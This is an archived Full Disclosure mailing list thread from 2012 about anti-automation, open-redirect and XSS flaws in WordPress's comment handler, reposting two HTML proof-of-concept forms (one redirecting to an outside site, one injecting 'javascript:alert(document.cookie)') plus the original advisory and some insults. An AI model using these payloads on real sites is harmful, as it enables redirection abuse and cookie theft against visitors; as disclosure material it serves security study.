Full Disclosure mailing list archives
Re: IAA, Redirector and XSS vulnerabilities in WordPress
From: Benji <me () b3nji com>
Date: Sat, 5 May 2012 15:00:36 +0100
Wow, yiou're like the jehovahs witnessess of the internet. Stop with the childish bitching and grow up. Last time I checked intern0t was also a script kid breeding ground. On Sat, May 5, 2012 at 2:54 PM, InterN0T Advisories <advisories () intern0t net> wrote:
Hi List, To stop MustLive's desperate act of trying to get visitors (and more backlinks) to his website, I have for those that doesn't want to go to there, just to see the PoC's but actually read them on this mailing list like almost _every other_ Proof of Concept / exploit, made them available below. Contents of Wordpress Redirector: <html> <head> <title>WordPress Redirector exploit (lol?) (C) 2012 MustLive. [removed]</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-comments-post.php" method="post"> <input type="hidden" name="author" value="Test" /> <input type="hidden" name="email" value="test () test test" /> <input type="hidden" name="comment" value="Test" /> <input type="hidden" name="comment_post_ID" value="1" /> <input type="hidden" name="redirect_to" value="http://awebsite.tld" /> </form> </body> </html> -------------------------------------- Contents of Wordpress XSS: <html> <head> <title>WordPress XSS exploit (lol?) (C) 2012 MustLive. [removed]</title> </head> <!-- <body onLoad="document.hack.submit()"> --> <body> <form name="hack" action="http://site/wp-comments-post.php" method="post"> <input type="hidden" name="author" value="Test" /> <input type="hidden" name="email" value="test () test test" /> <input type="hidden" name="comment" value="Test21" /> <input type="hidden" name="comment_post_ID" value="1" /> <input type="hidden" name="redirect_to" value="javascript:alert%28document.cookie%29//" /> </form> </body> </html> -------------------------------------- I don't really have any comments about these "exploits". Best regards, Nemesis 3.0 On Sat, 5 May 2012 16:01:53 +0300, "MustLive" <mustlive () websecurity com ua> wrote:Hello list! I want to warn you about security vulnerabilities in WordPress. These are Insufficient Anti-automation, Redirector and Cross-Site Scripting vulnerabilities. ------------------------- Affected products: ------------------------- Vulnerable are WordPress 2.0 - 3.3.1. ---------- Details: ---------- Already from WP 2.0 there are Insufficient Anti-automation, RedirectorandXSS vulnerabilities in wp-comments-post.php. With IAA I've faced justwhenbegun using WP in 2006. If the developers fixed vulnerabilities in previous two redirectors in WP 2.3, then these vulnerabilities were not fixedevenin WP 3.3.1 IAA (WASC-21): Lack of captcha in comment form allows to conduct automated attacks. Thedevelopers still haven't put captcha in WP comments form (from the firstversion of engine), which besides IAA attacks, also allowed to conduct Redirector and XSS attacks. By default in WordPress the premoderation is turned on, and also thereisbuilt-in anti-spam filter. But if 10 years ago the premoderation wouldbeenough, then long ago this mechanism couldn't be considered assufficientprotection against spam, and anti-spam filter had efficiency less then1%- only few from spam messages he marked as spam. And also these mechanismsdon't protect against below-mentioned attacks. Also plugin Akismet is bundled with WP, which is "captcha-less" protection against spam. But bydefault it's turned off and comparing with captcha it's considered aslessefficient and also doesn't protect against below-mentioned attacks. Redirector (URL Redirector Abuse) (WASC-38): Exploit: [Removed] XSS (WASC-08): Exploit: [Removed] XSS attack is possible on different browsers, but it's harder to conductthen in case of previous two redirectors (via data URI). At IIS web servers the redirect is going via Refresh header, and at other web servers - viaLocation header. Due to nuances of work of this script (filtering of important symbolsandadding of anchor), for execution of JS code it's needed to use tricky bypass methods. This complexity exists as with javascript URI, as with combo variant javascript URI + data URI. Reliable captcha protects against IAA, Redirector and XSSvulnerabilities.------------ Timeline: ------------ 2012.04.26 - disclosed at my site Best wishes & regards, MustLive Administrator of Websecurity web site _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- IAA, Redirector and XSS vulnerabilities in WordPress MustLive (May 05)
- Re: IAA, Redirector and XSS vulnerabilities in WordPress InterN0T Advisories (May 05)
- Re: IAA, Redirector and XSS vulnerabilities in WordPress Benji (May 05)
- Re: IAA, Redirector and XSS vulnerabilities in WordPress InterN0T Advisories (May 05)
- Re: IAA, Redirector and XSS vulnerabilities in WordPress Benji (May 05)
- Re: IAA, Redirector and XSS vulnerabilities in WordPress InterN0T Advisories (May 05)